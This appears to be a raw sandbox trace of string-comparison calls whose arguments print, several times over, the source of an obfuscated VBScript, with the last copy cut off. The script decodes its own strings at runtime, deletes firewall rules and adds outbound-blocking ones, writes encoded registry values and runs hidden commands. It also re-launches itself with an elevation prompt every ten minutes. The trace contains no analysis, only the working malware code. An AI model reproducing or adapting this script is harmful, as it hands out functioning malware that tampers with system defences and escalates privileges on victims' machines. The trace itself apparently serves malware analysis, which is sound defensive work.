bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0222.921] wcsncmp (_String1="\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.921] wcsncmp (_String1="\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0222.922] wcsncmp (_String1="\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.922] wcsncmp (_String1="Dim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 